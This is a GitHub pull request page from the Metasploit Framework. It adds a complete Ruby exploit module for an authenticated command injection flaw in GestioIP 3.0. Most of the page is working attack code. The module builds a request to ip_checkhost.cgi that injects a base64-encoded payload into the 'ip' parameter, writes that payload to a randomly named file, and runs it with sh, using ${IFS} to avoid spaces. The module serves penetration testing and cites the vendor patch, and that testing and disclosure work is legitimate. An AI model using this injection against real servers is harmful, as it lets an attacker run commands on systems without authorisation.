Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

GestioIP v3 Authenticated Remote Command Execution #2461

Merged
merged 3 commits into from Oct 4, 2013
Merged

GestioIP v3 Authenticated Remote Command Execution #2461

Changes from all commits
Commits
Show all changes
3 commits
Select commit Hold shift + click to select a range
0112d62
add gestio ip module
brandonprry Oct 4, 2013
ab786d1
Imply authentication when a password is set
Oct 4, 2013
9b79bb9
Add references, correct disclosure date
Oct 4, 2013
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Jump to
Jump to file
Failed to load files.
Diff view
Diff view
85 changes: 85 additions & 0 deletions modules/exploits/multi/http/gestioip_exec.rb
View file
Open in desktop
@@ -0,0 +1,85 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit4 < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient

def initialize(info = {})
super(update_info(info,
'Name' => 'GestioIP Remote Command Execution',
'Description' => %q{
This module exploits a command injection flaw to create a shell script
on the filesystem and execute it. If GestioIP is configured to use no authentication,
no password is required to exploit the vulnerability. Otherwise, an authenticated
user is required to exploit.
},
'License' => MSF_LICENSE,
'Author' =>
[
'bperry' #Initial Discovery and metasploit module
],
'References' =>
[
[ 'URL', 'http://sourceforge.net/p/gestioip/gestioip/ci/ac67be9fce5ee4c0438d27dfa5c1dcbca08c457c/' ], # Patch
[ 'URL', 'https://github.com/rapid7/metasploit-framework/pull/2461' ], # First disclosure
[ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2013/10/03/gestioip-authenticated-remote-command-execution-module' ]
],
'Payload' =>
{
'Space' => 475, # not a lot of room
'DisableNops' => true,
'BadChars' => "#",
},
'Platform' => [ 'unix', 'win', 'linux' ],
'Arch' => ARCH_CMD,
'Targets' => [[ 'Automatic GestioIP 3.0', { }]],
'Privileged' => false,
'DisclosureDate' => 'Oct 4 2013',
'DefaultTarget' => 0))

register_options(
[
OptString.new('URI', [true, 'URI', '/gestioip/']),
OptString.new('USERNAME', [false, 'The username to auth as', 'gipadmin']),
OptString.new('PASSWORD', [false, 'The password to auth with', nil])
], self.class)
end

def uri
datastore['URI']
end

def user
datastore['USERNAME']
end

def pass
datastore['PASSWORD']
end

def use_auth
!(pass.nil? or pass.empty?)
end

def exploit
headers = {}
if use_auth
headers['Authorization'] = "Basic " + Rex::Text.encode_base64("#{user}:#{pass}")
end

pay = Rex::Text.encode_base64(payload.encoded)
file = Rex::Text.rand_text_alpha(8);
send_request_cgi({
'uri' => uri+"ip_checkhost.cgi?ip=2607:f0d0:$(echo${IFS}" + pay + "|base64${IFS}--decode|tee${IFS}"+file+"&&sh${IFS}"+file+"):0000:0000:0000:0000:0004&hostname=fsd&client_id=1&ip_version=",
'headers' => headers
})
end
end